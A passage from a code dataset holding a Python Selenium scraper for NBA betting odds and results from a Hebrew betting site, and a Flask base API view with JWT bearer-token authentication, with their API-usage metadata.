{"api_name": "django.forms.ModelForm", "line_number": 22, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 22, "usage_type": "name"}, {"api_name": "django.forms.CharField", "line_number": 23, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 23, "usage_type": "name"}, {"api_name": "django.forms.RegexField", "line_number": 24, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 24, "usage_type": "name"}, {"api_name": "django.forms.CharField", "line_number": 25, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 25, "usage_type": "name"}, {"api_name": "crispy_forms.helper.FormHelper", "line_number": 28, "usage_type": "call"}, {"api_name": "crispy_forms.layout.Layout", "line_number": 33, "usage_type": "call"}, {"api_name": "crispy_forms.layout.Field", "line_number": 34, "usage_type": "call"}, {"api_name": "crispy_forms.layout.Field", "line_number": 35, "usage_type": "call"}, {"api_name": "crispy_forms.layout.Field", "line_number": 36, "usage_type": "call"}, {"api_name": "crispy_forms.layout.Field", "line_number": 37, "usage_type": "call"}, {"api_name": "crispy_forms.layout.Field", "line_number": 38, "usage_type": "call"}, {"api_name": "django.forms.ModelForm", "line_number": 48, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 48, "usage_type": "name"}, {"api_name": "crispy_forms.layout.Layout", "line_number": 58, "usage_type": "call"}, {"api_name": "crispy_forms.layout.Field", "line_number": 59, "usage_type": "call"}, {"api_name": "crispy_forms.layout.Field", "line_number": 60, "usage_type": "call"}, {"api_name": "crispy_forms.layout.Field", "line_number": 61, "usage_type": "call"}, {"api_name": "crispy_forms.layout.Field", "line_number": 62, "usage_type": "call"}, {"api_name": "crispy_forms.layout.Field", "line_number": 63, "usage_type": "call"}, {"api_name": "crispy_forms.layout.Field", "line_number": 64, "usage_type": "call"}, {"api_name": "crispy_forms.layout.Field", "line_number": 65, "usage_type": "call"}, {"api_name": "crispy_forms.layout.Field", "line_number": 66, "usage_type": "call"}, {"api_name": "crispy_forms.layout.Field", "line_number": 67, "usage_type": "call"}, {"api_name": "crispy_forms.layout.Field", "line_number": 68, "usage_type": "call"}, {"api_name": "django.forms.ModelForm", "line_number": 74, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 74, "usage_type": "name"}, {"api_name": "django.forms.URLField", "line_number": 75, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 75, "usage_type": "name"}, {"api_name": "crispy_forms.layout.Layout", "line_number": 85, "usage_type": "call"}, {"api_name": "crispy_forms.layout.Field", "line_number": 86, "usage_type": "call"}, {"api_name": "crispy_forms.layout.Field", "line_number": 87, "usage_type": "call"}, {"api_name": "crispy_forms.layout.Field", "line_number": 88, "usage_type": "call"}, {"api_name": "crispy_forms.layout.Field", "line_number": 89, "usage_type": "call"}, {"api_name": "crispy_forms.layout.Field", "line_number": 90, "usage_type": "call"}, {"api_name": "django.contrib.auth.forms.UserCreationForm", "line_number": 95, "usage_type": "name"}, {"api_name": "django.contrib.auth.forms.UserCreationForm.Meta", "line_number": 96, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.forms.UserCreationForm", "line_number": 96, "usage_type": "name"}, {"api_name": "django.contrib.auth.models.User", "line_number": 97, "usage_type": "name"}, {"api_name": "django.forms.Form", "line_number": 110, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 110, "usage_type": "name"}, {"api_name": "django.forms.CharField", "line_number": 111, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 111, "usage_type": "name"}, {"api_name": "django.forms.CharField", "line_number": 112, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 112, "usage_type": "name"}, {"api_name": "django.forms.BooleanField", "line_number": 113, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 113, "usage_type": "name"}]} +{"seq_id": "601035288", "text": "import numpy as np\r\nimport pandas as pd\r\nfrom bs4 import BeautifulSoup\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.common.by import By\r\nfrom selenium.webdriver.support.ui import WebDriverWait\r\nfrom selenium.webdriver.support import expected_conditions as EC\r\nimport time\r\nimport datetime\r\n\r\n\r\ndef days_between(d1, d2):\r\n \"\"\"\r\n a function that calculates the difference between two dates\r\n :param d1: string - string. format: (\"%Y-%m-%d\")\r\n :param d2: string - string. format: (\"%Y-%m-%d\")\r\n :return: int - difference between two dates\r\n \"\"\" \r\n d1 = datetime.datetime.strptime(d1, \"%Y-%m-%d\").date()\r\n d2 = datetime.datetime.strptime(d2, \"%Y-%m-%d\").date()\r\n return abs((d2 - d1).days)\r\n\r\ndef find_divs_display(driver,length,div_num,wait):\r\n \"\"\"\r\n a function that finds the right div number for the games display on the page. also call\r\n to click_games\r\n :param driver: selenium.webdriver.chrome.webdriver.WebDriver - the driver object\r\n :param length: int - the number of a div nubmer we are checking \r\n :param wait: selenium.webdriver.support.wait.WebDriverWait - the wait driver object\r\n :return: int - the right div number \r\n \"\"\"\r\n if(div_num == -1):\r\n for num in range(length):\r\n xpath = \"//*[@id='winnerLinePage']/div[1]/div[1]/div[1]/section[2]/div[\" + str(num)+\"]/div/div/div\"\r\n # just for find exluded time.sleep()\r\n games = wait.until(EC.invisibility_of_element_located((By.XPATH,\"xpath\")))\r\n games = driver.find_elements_by_xpath(xpath)\r\n x = click_games(driver,games)\r\n if(x == True):\r\n div_num = num\r\n break\r\n else:\r\n xpath = \"//*[@id='winnerLinePage']/div[1]/div[1]/div[1]/section[2]/div[\" + str(div_num)+\"]/div/div/div\"\r\n # just for find exluded time.sleep()\r\n games = wait.until(EC.invisibility_of_element_located((By.XPATH,\"xpath\")))\r\n games = driver.find_elements_by_xpath(xpath)\r\n click_games(driver,games)\r\n return div_num\r\n \r\ndef click_games(driver,games):\r\n \"\"\"\r\n a function that chcek which game display on the page and click on it\r\n :param driver: selenium.webdriver.chrome.webdriver.WebDriver - the driver object\r\n :param games: list - the list of games we check \r\n :return: bool - if find at least one game that displays on the page \r\n \"\"\"\r\n boolean = False\r\n for game in games:\r\n if(game.is_displayed()):\r\n boolean = True\r\n time.sleep(1)\r\n game.click()\r\n time.sleep(1)\r\n return boolean\r\n\r\ndef extract_lines_change_table_to_df(game_info):\r\n \"\"\"\r\n a function that extracts the important data from a div of a game \r\n :param game_info: bs4.element.Tag - the div game_info of a game included table of lines change \r\n :return team_name: str - the name of the home team\r\n :return: data frame - table with the lines change\r\n \"\"\" \r\n missing_change_line = False # this means the no team has plus and the line in this game didn't change\r\n\r\n team_name = game_info.find('span', class_ = 'teamText').text\r\n team_name = team_name.partition(\" לדף\")[0][1:]\r\n\r\n table = game_info.find('table',{ 'class' : 'kode-table kode-table-v3 smaller','data-has-x' : \"1\"})\r\n \r\n if(table is None):\r\n table = game_info.find('table',{ 'class' : 'kode-table kode-table-v3','data-has-x' : \"1\"})\r\n missing_change_line = True\r\n \r\n tables_rows = table.find_all('tr')\r\n lst = []\r\n \r\n for tr in tables_rows:\r\n td = tr.find_all('td')\r\n row = [tr.text for tr in td]\r\n lst.append(row)\r\n\r\n if(missing_change_line == True):\r\n lst = lst.append(np.NaN)\r\n \r\n df = pd.DataFrame(lst, columns=[\"date\", \"hour\", '1','X','2','advantage'])\r\n df = df.iloc[1:]\r\n\r\n return team_name,df\r\n\r\n\r\ndef extract_game_to_df(div):\r\n \"\"\"\r\n a function that extracts the important data from a div of a game \r\n :param div: bs4.element.Tag - the div of a game \r\n :return: data frame - the dataframe with the important variable \r\n \"\"\" \r\n spans = div.find_all('span')\r\n df = pd.DataFrame()\r\n \r\n df['time and date'] = [str(spans[3])[40:56]]\r\n df['teams'] = [spans[4].text]\r\n df['bet_home'] = [spans[6].text]\r\n df['bet_x'] = [spans[9].text]\r\n df['bet_guest'] = [spans[12].text]\r\n df['final_score'] = [spans[15].text]\r\n return df \r\n\r\ndef is_contain_game(df,game_check):\r\n \"\"\"\r\n a function that checks if the game is already in the dataframe\r\n :param df: dataframe - the dataframe with all the games \r\n :param game_check: str - the teams that play the game\r\n :return: data frame - table with the lines change\r\n :return: boolean - if the data frame contains the game\r\n \"\"\" \r\n is_conain = False\r\n games = df['teams'].tolist()\r\n for game in games:\r\n if(type(game) is str):\r\n if(game_check in game):\r\n is_conain = True\r\n return is_conain\r\n\r\ndef fill_NaN_cells(df):\r\n \"\"\"\r\n a function that fill in the NaN values\r\n :param df: dataframe - the dataframe with all records of a game \r\n :return: dataframe - dataframe witout NaN values\r\n \"\"\" \r\n for index in range(6):\r\n df.iloc[1:,index] = df.iloc[0,index]\r\n df = df.iloc[1:]\r\n return df \r\n\r\ndef extract_df_for_day(page_source):\r\n \"\"\"\r\n a function that gets a page source HTML code and returns a data frame of all the games and \r\n the useful details on the games\r\n :param page_source: str - string of the HTML code\r\n :return: data frame - the dataframe with all the games \r\n \"\"\"\r\n \r\n # parse the HTML code using xlml parser\r\n soup = BeautifulSoup(page_source,'lxml')\r\n \r\n df = pd.DataFrame()\r\n df['time and date'] = np.NaN\r\n df['teams'] = np.NaN\r\n df['bet_home'] = np.NaN\r\n df['bet_x'] = np.NaN\r\n df['bet_guest'] = np.NaN\r\n df['final_score'] = np.NaN\r\n df['date'] = np.NaN\r\n df['hour'] = np.NaN\r\n df['1'] = np.NaN\r\n df['X'] = np.NaN\r\n df['2'] = np.NaN\r\n df['advantage'] = np.NaN\r\n \r\n games_info = soup.find_all('div',class_ = 'game-info')\r\n dic = {}\r\n for game_info in games_info:\r\n teams_names_and_lines = extract_lines_change_table_to_df(game_info)\r\n dic[teams_names_and_lines[0]] = teams_names_and_lines[1]\r\n\r\n # find all games from the soup object\r\n game_a_filtered = soup.find_all('div',class_ = 'game is-father colorA disableBtns closedEvent hasExtraData open filtered-round')\r\n game_b_filtered = soup.find_all('div', class_ = 'game is-father colorB disableBtns closedEvent hasExtraData open filtered-round')\r\n game_a_open = soup.find_all('div',class_ = 'game is-father colorA disableBtns closedEvent hasExtraData open')\r\n game_b_open = soup.find_all('div', class_ = 'game is-father colorB disableBtns closedEvent hasExtraData open')\r\n \r\n # add games to the data frame\r\n for game in (game_a_filtered):\r\n df1 = extract_game_to_df(game)\r\n home_team = df1.iloc[0,1]\r\n if(is_contain_game(df,home_team)):\r\n continue\r\n home_team = min(home_team.partition(\"(\")[0][:-1],home_team.partition(\"-\")[0][:-2])\r\n df1 = df1.append(dic[home_team])\r\n df1 = fill_NaN_cells(df1)\r\n df = df.append(df1)\r\n \r\n for game in (game_b_filtered):\r\n df1 = extract_game_to_df(game)\r\n home_team = df1.iloc[0,1]\r\n if(is_contain_game(df,home_team)):\r\n continue\r\n home_team = min(home_team.partition(\"(\")[0][:-1],home_team.partition(\"-\")[0][:-2])\r\n df1 = df1.append(dic[home_team])\r\n df1 = fill_NaN_cells(df1)\r\n df = df.append(df1)\r\n \r\n for game in (game_a_open):\r\n df1 = extract_game_to_df(game)\r\n home_team = df1.iloc[0,1]\r\n if(is_contain_game(df,home_team)):\r\n continue\r\n home_team = min(home_team.partition(\"(\")[0][:-1],home_team.partition(\"-\")[0][:-2])\r\n df1 = df1.append(dic[home_team])\r\n df1 = fill_NaN_cells(df1)\r\n df = df.append(df1)\r\n \r\n for game in (game_b_open):\r\n df1 = extract_game_to_df(game)\r\n home_team = df1.iloc[0,1]\r\n if(is_contain_game(df,home_team)):\r\n continue\r\n home_team = min(home_team.partition(\"(\")[0][:-1],home_team.partition(\"-\")[0][:-2])\r\n df1 = df1.append(dic[home_team])\r\n df1 = fill_NaN_cells(df1)\r\n df = df.append(df1)\r\n \r\n return df \r\n\r\ndef full_data_frame_extract(webdriver_path,base_url,start_date,end_date,folder_path):\r\n \"\"\"\r\n a function that returns the full data frame with all NBA games between two dates. also, save a CSV file for each date\r\n :param webdriver_path: str - the path of the webdriver location\r\n :param base_url: str - the URL address\r\n :param start_date: str - strat date, fromat: (\"%Y-%m-%d\")\r\n :param end_date: str - end date, fromat: (\"%Y-%m-%d\")\r\n :param folder_path: str - folder path that the CSV for each day will save\r\n :return: data frame - a data frame with all the games and the important variables \r\n \"\"\"\r\n\r\n driver = webdriver.Chrome(webdriver_path)\r\n wait = WebDriverWait(driver,15)\r\n \r\n # define full dataframe\r\n full_df = pd.DataFrame()\r\n full_df['time and date'] = np.NaN\r\n full_df['teams'] = np.NaN\r\n full_df['bet_home'] = np.NaN\r\n full_df['bet_x'] = np.NaN\r\n full_df['bet_guest'] = np.NaN\r\n full_df['final_score'] = np.NaN\r\n full_df['date'] = np.NaN\r\n full_df['hour'] = np.NaN\r\n full_df['1'] = np.NaN\r\n full_df['X'] = np.NaN\r\n full_df['2'] = np.NaN\r\n full_df['advantage'] = np.NaN\r\n \r\n days_num = days_between(start_date,end_date) + 1\r\n\r\n for days in range(days_num):\r\n print(\"\")\r\n print(\"Date: \",start_date)\r\n \r\n url = base_url + start_date\r\n driver.get(url)\r\n \r\n time.sleep(2)\r\n \r\n is_nba = False\r\n # just for find excluded time.sleep()\r\n tochnia_element = wait.until(EC.invisibility_of_element_located((By.XPATH,\"//select[@class='leagueFilter selectpicker']\"))) \r\n tochnia_element = driver.find_element_by_xpath(\"//select[@class='leagueFilter selectpicker']\")\r\n time.sleep(0.5)\r\n # just for find excluded time.sleep()\r\n tochnia_all_options = wait.until(EC.visibility_of_element_located((By.TAG_NAME,\"option\")))\r\n tochnia_all_options = tochnia_element.find_elements_by_tag_name(\"option\")\r\n\r\n for option in tochnia_all_options:\r\n if(option.get_attribute(\"value\") == 'NBA'):\r\n option.click()\r\n is_nba = True\r\n print(\"There are NBA games on this day!!\") \r\n break\r\n if(is_nba == False):\r\n start_date = datetime.datetime.strptime(start_date, \"%Y-%m-%d\").date()\r\n start_date = str(start_date + datetime.timedelta(days=1))\r\n time.sleep(5)\r\n print(\"There aren't NBA games on this day :(\")\r\n continue\r\n \r\n tochnia_element = wait.until(EC.invisibility_of_element_located((By.XPATH,\"//select[@class='roundFilter selectpicker']\")))\r\n\r\n # just for find excluded time.sleep()\r\n tochnia_all_options = wait.until(EC.visibility_of_element_located((By.TAG_NAME,\"option\"))) \r\n tochnia_all_options = tochnia_element.find_elements_by_tag_name(\"option\")\r\n\r\n div_num = -1\r\n for option in tochnia_all_options:\r\n if(option.get_attribute(\"value\") == \"\"):\r\n continue\r\n option.click()\r\n\r\n # just for find excluded time.sleep()\r\n length = wait.until(EC.presence_of_element_located((By.XPATH,\"//*[@id='winnerLinePage']/div[1]/div[1]/div[1]/section[2]/div\")))\r\n length = len(driver.find_elements_by_xpath(\"//*[@id='winnerLinePage']/div[1]/div[1]/div[1]/section[2]/div\"))\r\n div_num = find_divs_display(driver,length,div_num,wait)\r\n\r\n time.sleep(2)\r\n\r\n content = driver.page_source\r\n df = extract_df_for_day(content)\r\n path = folder_path + 'NBA games on ' + start_date +'.csv'\r\n df.to_csv(path, index = False)\r\n print(\"NBA games on\", start_date , \"saved\")\r\n full_df = full_df.append(df)\r\n \r\n start_date = datetime.datetime.strptime(start_date, \"%Y-%m-%d\").date()\r\n start_date = str(start_date + datetime.timedelta(days=1))\r\n\r\n driver.quit()\r\n return full_df\r\n", "sub_path": "Data Scraping/Bankerim/web_scarping habankerim.py", "file_name": "web_scarping habankerim.py", "file_ext": "py", "file_size_in_byte": 12507, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "datetime.datetime.strptime", "line_number": 19, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 19, "usage_type": "attribute"}, {"api_name": "datetime.datetime.strptime", "line_number": 20, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 20, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.support.expected_conditions.invisibility_of_element_located", "line_number": 36, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions", "line_number": 36, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 36, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 36, "usage_type": "name"}, {"api_name": "selenium.webdriver.support.expected_conditions.invisibility_of_element_located", "line_number": 45, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions", "line_number": 45, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 45, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 45, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 61, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 63, "usage_type": "call"}, {"api_name": "numpy.NaN", "line_number": 93, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 95, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 108, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 154, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 156, "usage_type": "call"}, {"api_name": "numpy.NaN", "line_number": 157, "usage_type": "attribute"}, {"api_name": "numpy.NaN", "line_number": 158, "usage_type": "attribute"}, {"api_name": "numpy.NaN", "line_number": 159, "usage_type": "attribute"}, {"api_name": "numpy.NaN", "line_number": 160, "usage_type": "attribute"}, {"api_name": "numpy.NaN", "line_number": 161, "usage_type": "attribute"}, {"api_name": "numpy.NaN", "line_number": 162, "usage_type": "attribute"}, {"api_name": "numpy.NaN", "line_number": 163, "usage_type": "attribute"}, {"api_name": "numpy.NaN", "line_number": 164, "usage_type": "attribute"}, {"api_name": "numpy.NaN", "line_number": 165, "usage_type": "attribute"}, {"api_name": "numpy.NaN", "line_number": 166, "usage_type": "attribute"}, {"api_name": "numpy.NaN", "line_number": 167, "usage_type": "attribute"}, {"api_name": "numpy.NaN", "line_number": 168, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.Chrome", "line_number": 236, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 236, "usage_type": "name"}, {"api_name": "selenium.webdriver.support.ui.WebDriverWait", "line_number": 237, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 240, "usage_type": "call"}, {"api_name": "numpy.NaN", "line_number": 241, "usage_type": "attribute"}, {"api_name": "numpy.NaN", "line_number": 242, "usage_type": "attribute"}, {"api_name": "numpy.NaN", "line_number": 243, "usage_type": "attribute"}, {"api_name": "numpy.NaN", "line_number": 244, "usage_type": "attribute"}, {"api_name": "numpy.NaN", "line_number": 245, "usage_type": "attribute"}, {"api_name": "numpy.NaN", "line_number": 246, "usage_type": "attribute"}, {"api_name": "numpy.NaN", "line_number": 247, "usage_type": "attribute"}, {"api_name": "numpy.NaN", "line_number": 248, "usage_type": "attribute"}, {"api_name": "numpy.NaN", "line_number": 249, "usage_type": "attribute"}, {"api_name": "numpy.NaN", "line_number": 250, "usage_type": "attribute"}, {"api_name": "numpy.NaN", "line_number": 251, "usage_type": "attribute"}, {"api_name": "numpy.NaN", "line_number": 252, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 263, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions.invisibility_of_element_located", "line_number": 267, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions", "line_number": 267, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 267, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 267, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 269, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions.visibility_of_element_located", "line_number": 271, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions", "line_number": 271, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.TAG_NAME", "line_number": 271, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 271, "usage_type": "name"}, {"api_name": "datetime.datetime.strptime", "line_number": 281, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 281, "usage_type": "attribute"}, {"api_name": "datetime.timedelta", "line_number": 282, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 283, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions.invisibility_of_element_located", "line_number": 287, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions", "line_number": 287, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 287, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 287, "usage_type": "name"}, {"api_name": "selenium.webdriver.support.expected_conditions.visibility_of_element_located", "line_number": 290, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions", "line_number": 290, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.TAG_NAME", "line_number": 290, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 290, "usage_type": "name"}, {"api_name": "selenium.webdriver.support.expected_conditions.presence_of_element_located", "line_number": 300, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions", "line_number": 300, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 300, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 300, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 304, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 313, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 313, "usage_type": "attribute"}, {"api_name": "datetime.timedelta", "line_number": 314, "usage_type": "call"}]} +{"seq_id": "510688513", "text": "import json\nimport mimetypes\nfrom collections import OrderedDict\nfrom copy import deepcopy\n\nfrom flask import request, current_app, make_response, stream_with_context\nfrom flask.views import View\nfrom flask_login import UserMixin, current_user\nfrom werkzeug.exceptions import BadRequest\nfrom werkzeug.wrappers import Response\n\nfrom apps.users.jsonwebtoken import JWTError, JSONWebToken\nfrom apps.users.models import User\nfrom extensions import db, login_manager\nfrom .exceptions import (BadRequestError, NotFoundError, AccessDeniedError,\n UnauthorizedError, AppValueError, UnexpectedArguments,\n ModelKeyError)\nfrom .utils import url_for, JSONEncoder, check_kwargs\n\n\nclass BaseAPIView(View):\n methods = ['get', 'post', 'put', 'delete']\n\n __headers = None\n\n current_app = None\n current_user: User = None\n logger = None\n request = None\n json_data = None\n raw_response = False\n file_metadata = None\n\n status = 200\n limit = 30\n next_page = None\n current_page = None\n\n @property\n def offset(self):\n return self.limit * (self.current_page - 1) if self.limit else 0\n\n @property\n def common_args(self):\n return {\n 'limit': self.limit,\n 'offset': self.offset,\n 'sort': self.request.args.get('sort')\n }\n\n def __render(self, data):\n self.add_header('Content-Type', 'application/json; charset=utf-8')\n\n if self.status not in [200, 201]:\n response = data\n else:\n data_exists = False\n if data is not None:\n data_exists = True\n\n if not isinstance(data, list):\n if self.status == 201 and 'url' in data:\n self.add_location_header(data['url'])\n\n data = [data]\n\n if (self.limit and not self.next_page and\n len(data) == self.limit):\n self.next_page = self.current_page + 1\n\n response = OrderedDict({})\n response['links'] = self.__generate_response_links()\n\n if data_exists:\n response['items'] = data\n\n return (json.dumps(response, cls=JSONEncoder), self.status,\n self.__headers)\n\n def __render_file(self, data):\n if self.file_metadata.get('stream', False):\n ctx = data.iter_content(chunk_size=512)\n resp = Response(stream_with_context(ctx))\n else:\n resp = make_response(data)\n\n filename = self.file_metadata['filename']\n ext = '.' + filename.split('.')[-1]\n\n resp.headers['Content-Disposition'] = 'attachment; filename=' + filename\n resp.headers['Content-Type'] = self.file_metadata.get(\n 'content_type', mimetypes.types_map.get(ext)\n )\n\n return resp\n\n def __generate_response_links(self):\n q_params = self.request.args.copy()\n\n links = OrderedDict({})\n links['self'] = self.__build_url(q_params)\n\n if self.limit:\n if self.current_page and self.current_page > 1:\n q_params['page'] = self.current_page - 1\n links['prev'] = self.__build_url(q_params)\n\n if self.next_page:\n q_params['page'] = self.next_page\n links['next'] = self.__build_url(q_params)\n\n return links\n\n def __build_url(self, q_params):\n r = self.request\n base = f'{r.scheme}://{r.host}{r.path}'\n\n if not q_params:\n return base\n\n para = '&'.join([f'{k}={v}' for k, v in q_params.items()])\n return f'{base}?{para}'\n\n def __process_json_data(self):\n data = {}\n\n try:\n json_data = self.request.json or {}\n except BadRequest:\n return data\n\n for key, value in json_data.items():\n func = getattr(self, f'process_{key}_value', None)\n data[key] = func(value) if func else value\n\n return data\n\n def dispatch_request(self, *args, **kwargs):\n self.current_app = current_app\n self.logger = self.current_app.logger\n self.request = request\n self.raw_response = False\n\n method = getattr(self, self.request.method.lower(), None)\n if method is None and self.request.method.lower() == 'head':\n method = getattr(self, 'get', None)\n\n if not method:\n self.status = 405\n return self.__render({'error': 'method not allowed'})\n\n if self.request.method.lower() in ['get', 'head']:\n self.limit = int(self.request.args.get('limit', self.limit))\n self.current_page = int(self.request.args.get('page', 1))\n\n if self.request.method.lower() == 'post':\n self.status = 201\n\n # noinspection PyBroadException\n\n is_error = False\n\n try:\n if current_user.is_authenticated:\n self.current_user = current_user.user\n\n self.json_data = self.__process_json_data()\n\n check_kwargs(method, kwargs)\n data = method(*args, **kwargs)\n db.session.commit()\n\n except (BadRequestError, AppValueError, ModelKeyError) as e:\n self.status = 400\n data = {'error': e.message or 'bad request'}\n is_error = True\n\n except UnauthorizedError as e:\n self.status = 401\n data = {'error': e.message or 'unauthorized'}\n is_error = True\n\n except AccessDeniedError as e:\n self.status = 403\n data = {'error': e.message or 'access denied'}\n is_error = True\n\n except NotFoundError as e:\n self.status = 404\n data = {'error': e.message or 'not found'}\n is_error = True\n\n except UnexpectedArguments:\n self.status = 404\n data = {'error': 'nost found'}\n is_error = True\n\n except Exception as e:\n error_text = str(e)\n\n self.logger.error(error_text, exc_info=True)\n\n if not self.current_app.config['DEBUG']:\n error_text = 'unknown error'\n\n self.status = 500\n data = {'error': error_text}\n is_error = True\n\n if not is_error:\n if self.raw_response and isinstance(data, (Response, str)):\n return data\n elif self.file_metadata:\n return self.__render_file(data)\n else:\n db.session.rollback()\n\n return self.__render(data)\n\n def add_header(self, header, value):\n if self.__headers is None:\n self.__headers = {}\n self.__headers[header] = value\n\n def add_location_header(self, url):\n self.add_header('Location', url)\n\n def available_json_data(self, include=None, exclude=None, required=None):\n exclude_columns = {'id_', 'created_date', 'modified_date'}\n exclude_columns -= include or set()\n exclude_columns |= exclude or set()\n\n if required:\n for key in required:\n if key not in self.json_data:\n raise BadRequestError\n\n return {k: deepcopy(v) for k, v in self.json_data.items()\n if k not in exclude_columns}\n\n\nclass HealthCheckView(BaseAPIView):\n # noinspection PyMethodMayBeStatic\n def get(self):\n return None\n\n\nclass IndexView(BaseAPIView):\n # noinspection PyMethodMayBeStatic\n def get(self):\n return OrderedDict([\n ('sessions', url_for('general.sessions_view'))\n ])\n\n\n# Flask login stuff\n\nclass CurrentUser(UserMixin):\n user: User = None\n\n def __init__(self, user: User):\n self.user = user\n\n def get_id(self):\n return self.user.id_\n\n\n@login_manager.request_loader\ndef load_user_from_request(req):\n header = req.headers.get('Authorization')\n if not header:\n return None\n\n try:\n token_type, access_token = header.split(' ')\n except ValueError:\n raise BadRequestError('Wrong authorization header')\n\n if token_type.lower() != 'bearer':\n raise BadRequestError('Wrong authorization token type')\n\n jwt = JSONWebToken()\n\n try:\n user = jwt.get_user(access_token)\n except (NotFoundError, JWTError):\n return None\n\n return CurrentUser(user)\n", "sub_path": "src/general/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 8330, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "flask.views.View", "line_number": 21, "usage_type": "name"}, {"api_name": "flask.current_app", "line_number": 26, "usage_type": "name"}, {"api_name": "flask_login.current_user", "line_number": 27, "usage_type": "name"}, {"api_name": "apps.users.models.User", "line_number": 27, "usage_type": "name"}, {"api_name": "flask.request", "line_number": 29, "usage_type": "name"}, {"api_name": "collections.OrderedDict", "line_number": 71, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 77, "usage_type": "call"}, {"api_name": "utils.JSONEncoder", "line_number": 77, "usage_type": "name"}, {"api_name": "werkzeug.wrappers.Response", "line_number": 83, "usage_type": "call"}, {"api_name": "flask.stream_with_context", "line_number": 83, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 85, "usage_type": "call"}, {"api_name": "mimetypes.types_map.get", "line_number": 92, "usage_type": "call"}, {"api_name": "mimetypes.types_map", "line_number": 92, "usage_type": "attribute"}, {"api_name": "collections.OrderedDict", "line_number": 100, "usage_type": "call"}, {"api_name": "werkzeug.exceptions.BadRequest", "line_number": 129, "usage_type": "name"}, {"api_name": "flask.current_app", "line_number": 139, "usage_type": "name"}, {"api_name": "flask.request", "line_number": 141, "usage_type": "name"}, {"api_name": "flask_login.current_user.is_authenticated", "line_number": 164, "usage_type": "attribute"}, {"api_name": "flask_login.current_user", "line_number": 164, "usage_type": "name"}, {"api_name": "flask_login.current_user.user", "line_number": 165, "usage_type": "attribute"}, {"api_name": "flask_login.current_user", "line_number": 165, "usage_type": "name"}, {"api_name": "utils.check_kwargs", "line_number": 169, "usage_type": "call"}, {"api_name": "extensions.db.session.commit", "line_number": 171, "usage_type": "call"}, {"api_name": "extensions.db.session", "line_number": 171, "usage_type": "attribute"}, {"api_name": "extensions.db", "line_number": 171, "usage_type": "name"}, {"api_name": "exceptions.BadRequestError", "line_number": 173, "usage_type": "name"}, {"api_name": "exceptions.AppValueError", "line_number": 173, "usage_type": "name"}, {"api_name": "exceptions.ModelKeyError", "line_number": 173, "usage_type": "name"}, {"api_name": "exceptions.UnauthorizedError", "line_number": 178, "usage_type": "name"}, {"api_name": "exceptions.AccessDeniedError", "line_number": 183, "usage_type": "name"}, {"api_name": "exceptions.NotFoundError", "line_number": 188, "usage_type": "name"}, {"api_name": "exceptions.UnexpectedArguments", "line_number": 193, "usage_type": "name"}, {"api_name": 